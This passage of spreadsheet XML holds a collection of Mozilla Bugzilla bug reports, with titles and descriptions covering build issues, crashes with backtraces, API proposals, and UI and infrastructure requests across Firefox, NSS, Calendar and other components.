    <t>win32 build system is installing a lib with name '.lib'</t>
  </si>
  <si>
    <t>I just noticed this by sheer chance but the win32 build system is installing
a file with the name '.lib' into dist\win32_o.obj\lib for the build of 
mozilla\modules\libpref\src and mozilla\profile\acct
In mozilla\modules\libpref I get the following messages doing a clobber
build. Note the line that says
  Installing .\WIN32_O.OBJ\.lib into ..\..\..\dist\WIN32_O.OBJ\lib\.lib
---
+++ make: install in h:\mozilla\mozilla\modules\libpref
+++ make: install in h:\mozilla\mozilla\modules\libpref\public
+++ make: Creating typelib: .\_xpidlgen\pref.xpt
+++ make: installing typelib '.\_xpidlgen\pref.xpt' to components directory
    Installing .\_xpidlgen\pref.xpt into
..\..\..\dist\WIN32_O.OBJ\bin\components\pref.xpt
+++ make: install in h:\mozilla\mozilla\modules\libpref\src
prefapi.c
nsPref.cpp
nsPrefBranch.cpp
nsPrefService.cpp
nsPrefsFactory.cpp
nsAutoConfig.cpp
+++ make: Creating DLL: .\WIN32_O.OBJ\xppref32.dll
   Creating library .\WIN32_O.OBJ\xppref32.lib and object .\WIN32_O.OBJ\xppref32.exp
    Installing .\WIN32_O.OBJ\xppref32.dll into
..\..\..\dist\WIN32_O.OBJ\bin\components\xppref32.dll
    Installing .\WIN32_O.OBJ\.lib into ..\..\..\dist\WIN32_O.OBJ\lib\.lib
    Installing .\initpref.js into
..\..\..\dist\WIN32_O.OBJ\bin\defaults\pref\initpref.js
    Installing .\init\all.js into ..\..\..\dist\WIN32_O.OBJ\bin\defaults\pref\all.js
    Installing .\init\mailnews.js into
..\..\..\dist\WIN32_O.OBJ\bin\defaults\pref\mailnews.js
    Installing .\init\editor.js into
..\..\..\dist\WIN32_O.OBJ\bin\defaults\pref\editor.js
    Installing .\init\config.js into
..\..\..\dist\WIN32_O.OBJ\bin\defaults\pref\config.js
    Installing .\win\winpref.js into
..\..\..\dist\WIN32_O.OBJ\bin\defaults\pref\winpref.js
---</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-323786</t>
  </si>
  <si>
    <t>The Connecting to ... message should use minutes (or even hours) for how long until the next attempt.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8) Gecko/20060115 Firefox/1.5
Build Identifier: Chatzilla 0.9.69.3 [XULRunner 1.8/2006010808]
When you're connecting to a server and it's not working ChatZilla will double the amount of seconds between each connect and it can end up at a few thousand. It would be convenient if it would show it in minutes once it's 60+ seconds or even hours if need be.
It shouldn't be too difficult to change it but I'm not much of a coder... (Although I'm currently looking through the code for where this would have to be changed -- my_getReconnectDelayMs() in handlers.js I think but it would also require locale changes.)
Reproducible: Always
Steps to Reproduce:
1. /attach test.test
2. Wait a few minutes.
Actual Results:  
It always shows seconds for the next attempt in X seconds even when it's much more than a minute.
Expected Results:  
It should show minutes or even hours if it's that high.</t>
  </si>
  <si>
    <t>mnordhoff</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-263118</t>
  </si>
  <si>
    <t>Download section of release notes uses jargon</t>
  </si>
  <si>
    <t>Reported by Michael R. Wolf in bug 263113 comment 2.
-----
Mozilla Foundation provides Firefox binaries for Windows Linux and Mac OS X.
Windows: Installer
Linux: GTK2 + XFT installer
MacOS X: Compressed Disk Image
-----
Binaries is too geeky.  I'm not sure how to get rid of it.
Installer as the link text is confusing.  Michael R. Wolf: looks more like
I'm downloading the windows installer than a product that will be installed by
the windows installer.  Since the page doesn't offer a choice between Installer
and Zip builds it should label the download link something like Firefox for
Windows (English).</t>
  </si>
  <si>
    <t>NSS-324448</t>
  </si>
  <si>
    <t>Allow building NSS with MSVC without a standalone assembler</t>
  </si>
  <si>
    <t>We'd like to build Mozilla with the MSVC8 express free edition which doesn't come with the standalone assembler. There are two options:
1) (Expedient but not ideal) : if the standalone assembler is not found by configure just compile the C version (mpi.c)
2) (The Good and Right fix) Convert mpi_x86.asm to be a .c file with inline assembly (which can be handled by all versions of MSVC).</t>
  </si>
  <si>
    <t>CORE-56719</t>
  </si>
  <si>
    <t>[RFE] XUL Overlays should support Deep Merging</t>
  </si>
  <si>
    <t>Currently the overlay system works like this:
An overlay document is loaded and its top level children are walked. Code looks
up elements in the document the overlay is loaded into and if found the
attributes on the overlay node are set on the node in the document and any
sub-content appended or inserted appropriately.
However this is only done for the toplevel elements. For features like toolbar
customization to be implemented this isn't good enough - the merging has to be
done on all nodes with id attributes whose environment in the document matches
the environment in the overlay.
I have a patch that does this but it is mingled with some other code atm. Will
clean it up attach and seek review and approval asap.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-358817</t>
  </si>
  <si>
    <t>Fix search results and advanced search to use object IDs and filtering</t>
  </si>
  <si>
    <t>The search results and advanced search match objects (platform status etc.) by string instead of ID. We should rework those pages to use the ID selection widgets we already have in the form_widgets/ dir.
We should also integrate the hierarchical filtering we already use on the management pages on these reporting pages.</t>
  </si>
  <si>
    <t>CORE-355754</t>
  </si>
  <si>
    <t>Add nsTPtrArray which has a SafeElementAt method</t>
  </si>
  <si>
    <t>I'd like to move some table code to nsTArray but it makes extensive use of nsVoidArray::SafeElementAt.  Now SafeElementAt doesn't make sense for nsTArray but I'd like to propose:
template 
nsTPtrArray : public nsTArray
{
public:
  nsTPtrArray() {}
  explicit nsTPtrArray(size_type capacity) :
    nsTArray(capacity) {}
  T* SafeElementAt(index_type i) {
    if (i &gt;= Length()) {
      return nsnull
    }
    return ElementAt(i)
  }
}
Thoughts?</t>
  </si>
  <si>
    <t>CORE-504681</t>
  </si>
  <si>
    <t>crash (segfault) @res2_inverse when playing corrupted ogg vorbis file</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Build Identifier: mozilla-central revision 69ebef6ff887
Segmentation fault when playing corrupted ogg vorbis file (attached).
Reproducible: Always
Steps to Reproduce:
1. Load attached file.
Actual Results:  
firefox crashes
Expected Results:  
some sort of this file is corrupted message
Backtrace from a program that uses the ogg libraries similarly to firefox (i.e.
oggplayer):
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb2dc9b90 (LWP 29944)]
0x0808a968 in res2_inverse ()
Current language:  auto currently asm
(gdb) backtrace
#0  0x0808a968 in res2_inverse ()
#1  0x0808c3d4 in mapping0_inverse ()
#2  0x0805ced3 in fs_vorbis_decode (fsound=0x96307c0 
    buf=0x965daf8 ï¿½&gt;Y\026/ï¿½d\021&lt;ï¿½a\210\002e bytes=54)
    at fishsound_vorbis.c:158
#3  0x08057029 in oggplay_callback_audio (oggz=0x961f200 op=0x965dab8 
    serialno=1704177930 user_data=0x9630758) at oggplay_callback.c:392
#4  0x0805fdfd in oggz_read_deliver_packet (elem=0x965dab8) at oggz_read.c:303
#5  0x080649b8 in oggz_dlist_deliter (dlist=0x961f440 
    func=0x805fd00 ) at oggz_dlist.c:183
#6  0x0806045f in oggz_read_sync (oggz=0x961f200) at oggz_read.c:462
#7  0x08060783 in oggz_read (oggz=0x961f200 n=8192) at oggz_read.c:606
#8  0x080555e6 in oggplay_step_decoding (me=0x961f040) at oggplay.c:691
#9  0x0804d04b in decode_thread (p=0xbfcc6f48) at oggplayer.cpp:313
#10 0xb7d2f83b in ?? () from /usr/lib/libSDL-1.2.so.0
#11 0xb7d7d71d in ?? () from /usr/lib/libSDL-1.2.so.0
#12 0xb7dbd4ff in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
#13 0xb7ab649e in clone () from /lib/tls/i686/cmov/libc.so.6
Also this looks very similar to https://bugzilla.mozilla.org/show_bug.cgi?id=499512 (but it isn't exactly the same - 499512 is an arithmetic exception)</t>
  </si>
  <si>
    <t>dkeeler</t>
  </si>
  <si>
    <t>NSS-278276</t>
  </si>
  <si>
    <t>Slot List Elements cannot be freed by applications.</t>
  </si>
  <si>
    <t>There are a set of helpler functions for safely traversing SlotLists. These
functions return SlotListElements which have their own references. When
iterating through a full tree of slot lists the references are handled
correctly because the GetNext() or GetNextSafe() functions automatically
decrement the slot list.
Inside of NSS itself the references are handled correctly because they can call
the pk11_FreeSlotListElement() private function.
This function however is not exported so applications which write code like:
for (le = PK11_GetFirstSafe(slotList) le le =
PK11_GetNextSafe(slotListlePR_FALSE)) {
    if (le-&gt;slot == MySlot) {
        break
    }
}
will leak a reference to le.
The solution is to export a public function equivalent to pk11_FreeSlotListElement.
There is at least one PSM leak of this time.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-32239</t>
  </si>
  <si>
    <t>rebuildcvshistory fails on files whose rlog date are in mm/dd/yyyy format.</t>
  </si>
  <si>
    <t>rebuildcvshistory fails on files whose rlog date are in mm/dd/yyyy format.
Output from command:
Rebuilding entire checkin history in Bridge (`Bridge' tree) ...
Doing directories: bridge ...
/home/cms/local/cvsroot/bridge/bin/1stv
Use of uninitialized value at
        /opt/mozilla/webtools/bonsai/rebuildcvshistory.cgi line 115  chunk 29 
(#1)
    (W) An undefined value was used as if it were already defined.  It was
    interpreted as a  or a 0 but maybe it was a mistake.  To suppress this
    warning assign an initial value to your variables.
Synopsis:
Line 112 attempts to convert dates in yyyy/mm/dd format to mm/dd/yyyy format. 
However if the date is already in the mm/dd/yyyy format line 112 converts it 
to dd/yyyy/mm which is not a valid date so str2time returns a null date.
Proposed Revision:
# diff rebuildcvshistory.cgi /opt/mozilla/webtools/bonsai/rebuildcvshistory.cgi
1c1
&gt; #!/usr/local/bin/perl -w
112c112
&lt;                                    $datestr =~ s!^(\d+)/(\d+/\d+)!$2/$1!
---
&gt;                                    $datestr =~ s!^(\d{4})/(\d+/\d+)!$2/$1!
This solved the issue on our system</t>
  </si>
  <si>
    <t>mgstahl</t>
  </si>
  <si>
    <t>CORE-152756</t>
  </si>
  <si>
    <t>Add &amp; implement imgIContainer::ResetAnimation</t>
  </si>
  <si>
    <t>ResetAnimation or starting from frame 0 again is needed for various functions
in Mozilla (reloading page/image and setting image.src are two that come to mind).
StopAnimation and StartAnimation do not reset the animation to the beginning.
One could reset the animation on StopAnimation but this would break backwards
compatibility and remove the feature of pausing an animation.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-742710</t>
  </si>
  <si>
    <t>developer-stage9.mozilla.org: fix migration</t>
  </si>
  <si>
    <t>We are getting these errors from stage9:
south.exceptions.InconsistentMigrationHistory: Inconsistent migration history
The following options are available:
    --merge: will just attempt the migration ignoring any potential dependency conflicts.
There was an error while updating. Please try again later. Aborting.
The fix should be the same as we did on production yesterday with :jd:
rm apps/wiki/migrations/0007_add_locale_slug_uniqueness.py</t>
  </si>
  <si>
    <t>lcrouch</t>
  </si>
  <si>
    <t>CORE-357625</t>
  </si>
  <si>
    <t>getTextAtOffset doesn't seem to work well with text with  in it</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061016 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20061016 Minefield/3.0a1
I did a search and saw a similar problem in bug 349909 https://bugzilla.mozilla.org/show_bug.cgi?id=349909.  It was marked as fixed but I either don't have the fix in my version from Oct 16 (the ftp site is down for me to be able to get the latest nightly) or a different bug still exists.  
Reproducible: Always
Steps to Reproduce:
1. Open the attached URL as the only content in firefox (i.e. don't open any other tabs)
2. Run the attached standalone app
3. Turn on caret navigation and arrow up/down in the content (the caret is just a way to trigger the analysis code in the standalone app).
Actual Results:  
Text (len=304): 1This sentence is in Comic Sans MSl font.
2This sentence is in Courier New Font.
3This sentence is in Garamondl font.
4This sentence is in Impact font.
5This sentence is in Lucida Console font.
6This sentence is in Sydnie font.
7This sentence is in Tahoma font.
8This sentence is in Times New Roman font.
CHAR AT OFFSET 0: '1'
LINE AT OFFSET 0: (0:41) 1This sentence is in Comic Sans MSl font.
CHAR AT OFFSET 41: '
'
CHAR AT OFFSET 42: '2'
LINE AT OFFSET 42: (0:41) 1This sentence is in Comic Sans MSl font.
END OFFSET &lt; OFFSET!!!!
Expected Results:  
The getTextAtOffset for a line at character 42 should not be for the text range (0:41).  In this case it should start at 42.</t>
  </si>
  <si>
    <t>TOOLKIT-779057</t>
  </si>
  <si>
    <t>DirInstallLocation._readAddons() deletes stale pointer files unsafely</t>
  </si>
  <si>
    <t>DirInstallLocation._readAddons() will delete a pointer file if it finds its stale (ie not valid). However it does so unsafely - not checking if it's able to remove the file and not catching any exceptions if deleting the file fails. It should wrap the .remove() in a try/catch block so that if it does fail things can just continue on normally.
The code in question is:
http://hg.mozilla.org/mozilla-central/file/99c53832abfe/toolkit/mozapps/extensions/XPIProvider.jsm#l6305</t>
  </si>
  <si>
    <t>markcapella</t>
  </si>
  <si>
    <t>blair</t>
  </si>
  <si>
    <t>CORE-186216</t>
  </si>
  <si>
    <t>image decoders don't need to #include nsIImage.h</t>
  </si>
  <si>
    <t>many image decoders include nsIImage even though it's not used.</t>
  </si>
  <si>
    <t>CALENDAR-258898</t>
  </si>
  <si>
    <t>formatDateInterval on multiday event concatenates dates with -- undefined</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040910 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040910 Firefox/0.10 20040910-cal
DateFormater.formatDateInterval on event which lasts over different days with
start and end times formats incorrectly.
Reproducible: Always
Steps to Reproduce:
1. new event
2. start:  9:00 1 sep 2004
3. end:   15:00 3 sep 2004
4. ok
5. select event
6. export event to html
Actual Results:  
When: 2004-09-01 09:002004-09-03 15:00  undefined
Expected Results:  
When: 2004-09-01 09:00  2004-09-03 15:00</t>
  </si>
  <si>
    <t>SEAMONKEY-436357</t>
  </si>
  <si>
    <t>Don't use RDF for the filter list dialog tree</t>
  </si>
  <si>
    <t>As a bonus we get more realistic refresh behaviour. (The filter DS does not receive any change notifications so everyone has to rebuild it all the time.)</t>
  </si>
  <si>
    <t>SEAMONKEY-205121</t>
  </si>
  <si>
    <t>don't purge if junk mail is disabled</t>
  </si>
  <si>
    <t>don't purge if junk mail is disabled.
note if junk is disable we disable the purge UI so we should fix the back end
to disable purging.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-381135</t>
  </si>
  <si>
    <t>Yahoo! Answers search engine won't download</t>
  </si>
  <si>
    <t>Found this the other day but don't want to forget about it.  Click Yahoo! Answers on this page:
https://addons.mozilla.org/en-US/firefox/browse/type:4
and you get an error about it not finding:
https://addons.mozilla.org/en-US/firefox/downloads/file/13655/yahoo!_answers.src
fligtar noticed that if you take the ! out of the URL it works.</t>
  </si>
  <si>
    <t>CORE-122826</t>
  </si>
  <si>
    <t>Changing menu item label doesn't update item</t>
  </si>
  <si>
    <t>Forgot to check the changing of an item's |label| attribute in the dom to
rebuild a menu. was bug 11829 in bugscape.
patch coming up</t>
  </si>
  <si>
    <t>MOZILLA.ORG-505582</t>
  </si>
  <si>
    <t>Ship mintty/Console2/ConEmu-Maximus5 as the default MozillaBuild terminal</t>
  </si>
  <si>
    <t>We've all had enough of the windows terminal. It's time for change.</t>
  </si>
  <si>
    <t>CORE-397561</t>
  </si>
  <si>
    <t>ASSERTION: An XBL file is malformed.  Did you forget the XBL namespace on the bindings tag</t>
  </si>
  <si>
    <t>Created attachment 282323
testcase
This testcase triggers an assertion.  I think the assertion is just bogus.
###!!! ASSERTION: An XBL file is malformed.  Did you forget the XBL namespace on the bindings tag?: 'Error' file /Users/jruderman/trunk/mozilla/content/xbl/src/nsXBLService.cpp line 404
It also triggers a gigantic leak but I think that's covered by bug 324465 and bug 394052.
I've also seen the assertion (and leak) happen in cases where afaik the XBL isn't actually malformed but I can't reproduce that reliably and it's probably a separate issue from both the assertion shouldn't be an assertion and the leak.</t>
  </si>
  <si>
    <t>NSS-424471</t>
  </si>
  <si>
    <t>counter overflow in bltest</t>
  </si>
  <si>
    <t>There is some kind of wrapping problem for the data in using bltest.
See below :
[jp96085@monstre]/export/home/julien/nss/tip/mozilla/dist/SunOS5.10_i86pc_64_OPT.OBJ/bin 47 % !22
./bltest -E -m rc4 -g 16 -p 100 -4 2 -i ./bltest -o /dev/null
#     mode          in symmkey  opreps  cxreps     context          op   time(sec)     thrgput
     rc4_e       698Mb     128     200       0       0.000    2212.000       1.147       609Mb
[jp96085@monstre]/export/home/julien/nss/tip/mozilla/dist/SunOS5.10_i86pc_64_OPT.OBJ/bin 48 % ./bltest -E -m rc4 -g 16 -p 100 -4 2 -i ./bltest -o /dev/null
#     mode          in symmkey  opreps  cxreps     context          op   time(sec)     thrgput
     rc4_e       698Mb     128     200       0       0.000    2242.000       1.142       611Mb
[jp96085@monstre]/export/home/julien/nss/tip/mozilla/dist/SunOS5.10_i86pc_64_OPT.OBJ/bin 49 % ./bltest -E -m rc4 -g 16 -p 10000 -4 2 -i ./bltest -o /dev/null
#     mode          in symmkey  opreps  cxreps     context          op   time(sec)     thrgput
     rc4_e         4Gb     128     20T       0       0.000  220783.000     112.386        38Mb
[jp96085@monstre]/export/home/julien/nss/tip/mozilla/dist/SunOS5.10_i86pc_64_OPT.OBJ/bin 50 % ./bltest -E -m rc4 -g 16 -p 1000 -4 2 -i ./bltest -o /dev/null
#     mode          in symmkey  opreps  cxreps     context          op   time(sec)     thrgput
     rc4_e         6Gb     128      2T       0       0.000   22216.000      11.148       626Mb
[jp96085@monstre]/export/home/julien/nss/tip/mozilla/dist/SunOS5.10_i86pc_64_OPT.OBJ/bin 51 % ./bltest -E -m rc4 -g 16 -p 2000 -4 2 -i ./bltest -o /dev/null
#     mode          in symmkey  opreps  cxreps     context          op   time(sec)     thrgput
     rc4_e         5Gb     128      4T       0       0.000   45420.000      22.807       253Mb
In the 3rd and 5th tests the data wrapped around somehow. What's interesting is that it's above 4 Gb . So not sure exactly where it wraps. Anyway given how fast the RC4 speed seems to be the counter overflows in about 20 seconds on my dual Opteron 2.2 so we should fix it.</t>
  </si>
  <si>
    <t>CORE-294784</t>
  </si>
  <si>
    <t>crash on unpaired restore()</t>
  </si>
  <si>
    <t>restore() lineWidth
...crashes if you don't have a save().</t>
  </si>
  <si>
    <t>CORE-333351</t>
  </si>
  <si>
    <t>0 deref in BasicTableLayoutStrategy</t>
  </si>
  <si>
    <t>coverity thinks that the code is sloppy around http://lxr.mozilla.org/seamonkey/source/layout/tables/BasicTableLayoutStrategy.cpp#1142
the col frame should be questioned for 0 like in the loop above and below</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-419999</t>
  </si>
  <si>
    <t>need to shift around minis for linux moz2 testing.</t>
  </si>
  <si>
    <t>Now that I have a better idea what I'm actually going to be testing I need to make some changes to the set of minis.  We currently have:
qm-plinux-trunk01/02/03/04
qm-plinux-branch01
What I'd like is:
qm-plinux-trunk01/02/03/04/05/06
So a whole set of 6 machines.  We can re-purpose qm-plinux-branch01 for this and then we'll also need to grab a free machine.</t>
  </si>
  <si>
    <t>CALENDAR-413265</t>
  </si>
  <si>
    <t>Some timezones not mapped correctly</t>
  </si>
  <si>
    <t>TODO: Need testing to see if these are guessed properly on other OS's.
On Mac if you set these timezones to these zones and then you restart the Calendar (Sunbird or lightning) with a new profile the zones are not guessed properly.
== Actual ==
Asia/Jerusalem --&gt; gets guessed as floating
Australia/Adelaide --&gt; gets guessed as floating
Australia/Sydney --&gt; gets guessed as Australia/Currie
== Expected ==
Asia/Jerusalem --&gt; Asia/Jerusalem
Australia/Adelaide --&gt; Australia/Adeliade
Australia/Sydney --&gt; Australia/Sydney</t>
  </si>
  <si>
    <t>BUGZILLA-320309</t>
  </si>
  <si>
    <t>Update Changes Page for 2.16.11 2.18.5 2.20.1 and 2.22rc1</t>
  </si>
  <si>
    <t>I'll probably end up doing this if nobody else does but I always appreciate a patch! :-)</t>
  </si>
  <si>
    <t>CORE-513063</t>
  </si>
  <si>
    <t>Avoid bit twiddling on double values</t>
  </si>
  <si>
    <t>The attached patch performs DOUBLE_IS_INT and friends directly on floating point registers using compiler intrinsics to determine whether a number is nan or finite instead of forcing it into memory and meddle with the bit representation.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-300494</t>
  </si>
  <si>
    <t>Hendrix should record Version</t>
  </si>
  <si>
    <t>The submission should either transparently record the UserAgent string of the
reporter or use it to populate some changable combo boxes so it is clear which
version the reported problem is experienced on.
Whether or not to show the boxes i leave up to you - too many options may make
it overly daunting to the non-technical user.</t>
  </si>
  <si>
    <t>FIREFOX-433018</t>
  </si>
  <si>
    <t>Firefox asks to save windows and tabs when only one tab is open and checking never ask again turns off warning when closing a window with multiple tabs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9pre) Gecko/2008050812 Minefield/3.0pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.9pre) Gecko/2008050812 Minefield/3.0pre
See comments from number 28 in bug 428843. This causes undesired side effects with an inaccurate message.
Following on from the above patch Firefox now prompts to save 'tabs' on exit even when none are open.
Apart from the message being inaccurate because no tabs are open this is an extremely frustrating annoyance.
When no tabs are open there should be no prompt. In the rare event that the user accidentally closes the browser they can always go to the most recent one in their history when they start.
As things now stand the user would either have to
1.) Put up with the prompt each and every time they close the browser.
2.) Disable the prompt and never get prompted even if they have multiple tabs open.
3.) disable the prompt but have the session restored every time thus bypassing their homepage.
I feel the patch for 428843 should therefore be backed out.
Reproducible: Always
Steps to Reproduce:
1. Ensure preference browser.tabs.warnOnClose = true
2. Open the browser.
3. Close the browser
Actual Results:  
You get an erroneous (and unnecessary) prompt.
Expected Results:  
The browser should close without prompting.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-420080</t>
  </si>
  <si>
    <t>Prism icons are screwy</t>
  </si>
  <si>
    <t>The application icon (visible in the taskbar) is the generic Windows one. The install-shortcut dialog doesn't have any icon. This is easy to fix (set dialog feature to no) but then the generic Windows icon is used as well. It seems like to fix this we will need to compile our own icon resources into the .exe (this might be another reason for the stub executable that mfinkle has been arguing for). Note that the dialogs displayed by Prism apps (e.g. addons) also use the generic icon so each would presumably have to have its own custom executable (stub) as well.
Not sure if this is an issue on Linux as well. Can some Linux person please comment?</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-420616</t>
  </si>
  <si>
    <t>Drop nsISupportsArray usage from nsImapIncomingServer</t>
  </si>
  <si>
    <t>Created attachment 306910
The fix
As with the ongoing effort dropping nsISupportsArray from here tidies the code a bit and will introduce some additional type safety.</t>
  </si>
  <si>
    <t>CORE-105964</t>
  </si>
  <si>
    <t>Drop 20 bytes off each imgRequest object</t>
  </si>
  <si>
    <t>There is no real point in using nsCString's in imgRequest for the content 
type.  Changing to a char* will save us 20 bytes :-)</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-329849</t>
  </si>
  <si>
    <t>repeat refreshing impacting tabbing</t>
  </si>
  <si>
    <t>Got this testcase from a user on the newsgroup.
Looks like if I have an input inside a repeat with a nodeset the size of two (so the user sees two inputs)and I tab around the tab goes from the first input to the second very smoothly.  However if I change the value of the first input and hit tab it DOESN'T go to the second input.  It ends up somewhere else (seems like the document).  I see that the repeat's refresh method is called which will delete all of the contents of the repeat element and rebuild them.  I think that is what is screwing up the focus chain.
On 180branch we actually see a this.parentNode error.  Doesn't happen on trunk but I think that is more of a side effect of Surkov's getControl changes in the XBL.  But if we do a setValue in a blur handler and then do other things in the  handler interacting with the control we could ru into other issues.  Probably not limited to this testcase.</t>
  </si>
  <si>
    <t>xforms</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-370211</t>
  </si>
  <si>
    <t>Integrate test runs into the Run Tests process</t>
  </si>
  <si>
    <t>The Run Tests process needs to change to use test runs as the basis for running tests. The progression will be as follows:
1) Starting point: list of recommended test runs as Litmus main index page OR separate page that lists both recommended test runs and all available test runs
2) User selects test run based on displayed config requirements (confirmation before proceeding)
3) User fills out config information not specified in the test run
4) User selects subgroup from available choices
5) User fills in results for listed testcases
6) Confirmation of submission with links to continue testing other test runs and reporting.
Steps 3-&gt;6 are largely unchanged from the current system modulo the pre-population and limiting of some config values in step 3.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-484607</t>
  </si>
  <si>
    <t>remove NO_JAR_AUTO_REG occurrences inside comm-central</t>
  </si>
  <si>
    <t>The NO_JAR_AUTO_REG was part of the support for installed-chrome.txt (actually suppressing entries to be added there even when a contents.rdf is found) in the old chrome registry so any place that doesn't need to build with old xpfe should not have it.
Despite that we still have a few occurrences of it in comm-central itself and those should be removed (note that pulled-in extensions might still support to be built with xpfe and therefore need to keep it).</t>
  </si>
  <si>
    <t>CORE-613278</t>
  </si>
  <si>
    <t>ASSERTION: Want to fire mutation events but it's not safe when CSP is considering the load of a font (test_CSP_evalscript.html / test_CSP.html)</t>
  </si>
  <si>
    <t>In mochitest-plain-1 there are 20 assertions of the form:
###!!! ASSERTION: Want to fire mutation events but it's not safe: '(aNode-&gt;IsNodeOfType(nsINode::eCONTENT) &amp;&amp; static_cast(aNode)-&gt; IsInNativeAnonymousSubtre
e()) || sScriptBlockerCount == sRemovableScriptBlockerCount' file /builds/slave/mozilla-central-linux-debug/build/content/base/src/nsContentUtils.cpp line 3662
that seem related to CSP and loading of fonts.  This stack looks pretty scary to me so marking security-sensitive.
They start happening between here:
1175 INFO TEST-END | /tests/content/base/test/test_CSP.html | finished in 1523ms
and here:
1176 INFO TEST-START | /tests/content/base/test/test_CSP_evalscript.html
and continue to here:
1177 INFO TEST-PASS | /tests/content/base/test/test_CSP_evalscript.html | EVAL SCRIPT BLOCKED: setTimeout(String)(setTimeout with a string was blocked)
The relevant stack is:
nsContentUtils::HasMutationListeners [content/base/src/nsContentUtils.cpp:3665]
nsINode::doRemoveChildAt [content/base/src/nsGenericElement.cpp:3661]
nsGenericElement::RemoveChildAt [content/base/src/nsGenericElement.cpp:3637]
nsContentUtils::SetNodeTextContent [content/base/src/nsContentUtils.cpp:4123]
nsGenericHTMLElement::SetInnerHTML [content/html/content/src/nsGenericHTMLElement.cpp:732]
nsIDOMNSHTMLElement_SetInnerHTML [dom_quickstubs.cpp:21471]
js::CallJSPropertyOpSetter [js/src/jscntxtinlines.h:738]
js::Shape::set [js/src/jsscopeinlines.h:275]
js_NativeSet [js/src/jsobj.cpp:4947]
js::Interpret [js/src/jsinterp.cpp:4411]
js::RunScript [js/src/jsinterp.cpp:657]
js::Invoke [js/src/jsinterp.cpp:737]
js::ExternalInvoke [js/src/jsinterp.cpp:862]
js::ExternalInvoke [js/src/jsinterp.h:955]
JS_CallFunctionValue [js/src/jsapi.cpp:4973]
nsXPCWrappedJSClass::CallMethod [js/src/xpconnect/src/xpcwrappedjsclass.cpp:1694]
nsXPCWrappedJS::CallMethod [js/src/xpconnect/src/xpcwrappedjs.cpp:588]
PrepareAndDispatch [xpcom/reflect/xptcall/src/md/unix/xptcstubs_gcc_x86_unix.cpp:95]
nsObserverList::NotifyObservers [xpcom/ds/nsObserverList.cpp:129]
nsObserverService::NotifyObservers [xpcom/ds/nsObserverService.cpp:185]
xptiInterfaceEntry::EnsureResolved [xpcom/reflect/xptinfo/src/xptiprivate.h:264]
CallMethodHelper::Invoke [js/src/xpconnect/src/xpcwrappednative.cpp:3042]
CallMethodHelper::Call [js/src/xpconnect/src/xpcwrappednative.cpp:2304]
XPCWrappedNative::CallMethod [js/src/xpconnect/src/xpcwrappednative.cpp:2268]
XPC_WN_CallMethod [js/src/xpconnect/src/xpcwrappednativejsops.cpp:1594]
js::CallJSNative [js/src/jscntxtinlines.h:684]
js::Interpret [js/src/jsinterp.cpp:4779]
js::RunScript [js/src/jsinterp.cpp:657]
js::Invoke [js/src/jsinterp.cpp:737]
js::ExternalInvoke [js/src/jsinterp.cpp:862]
js::ExternalInvoke [js/src/jsinterp.h:955]
JS_CallFunctionValue [js/src/jsapi.cpp:4973]
nsXPCWrappedJSClass::CallMethod [js/src/xpconnect/src/xpcwrappedjsclass.cpp:1694]
nsXPCWrappedJS::CallMethod [js/src/xpconnect/src/xpcwrappedjs.cpp:588]
PrepareAndDispatch [xpcom/reflect/xptcall/src/md/unix/xptcstubs_gcc_x86_unix.cpp:95]
CSPService::ShouldLoad [content/base/src/nsCSPService.cpp:134]
nsContentPolicy::CheckPolicy [content/base/src/nsContentPolicy.cpp:157]
nsContentPolicy::ShouldLoad [content/base/src/nsContentPolicy.cpp:218]
NS_CheckContentLoadPolicy [nsContentPolicyUtils.h:221]
nsFontFaceLoader::CheckLoadAllowed [layout/style/nsFontFaceLoader.cpp:190]
nsUserFontSet::StartLoad [layout/style/nsFontFaceLoader.cpp:260]
gfxUserFontSet::LoadNext [gfx/thebes/gfxUserFontSet.cpp:637]
gfxUserFontSet::FindFontEntry [gfx/thebes/gfxUserFontSet.cpp:192]
FindFontPatterns [gfx/thebes/gfxPangoFonts.cpp:1030]
gfxFcFontSet::SortPreferredFonts [gfx/thebes/gfxPangoFonts.cpp:1193]
gfxFcFontSet::gfxFcFontSet [gfx/thebes/gfxPangoFonts.cpp:938]
gfxPangoFontGroup::MakeFontSet [gfx/thebes/gfxPangoFonts.cpp:1728]
gfxPangoFontGroup::GetBaseFontSet [gfx/thebes/gfxPangoFonts.cpp:2194]
gfxPangoFontGroup::GetBaseFont [gfx/thebes/gfxPangoFonts.cpp:1666]
gfxPangoFontGroup::GetFontAt [gfx/thebes/gfxPangoFonts.cpp:1685]
nsThebesFontMetrics::GetMetrics [gfx/src/thebes/nsThebesFontMetrics.cpp:112]
...
ViewportFrame::Reflow [layout/generic/nsViewportFrame.cpp:293]</t>
  </si>
  <si>
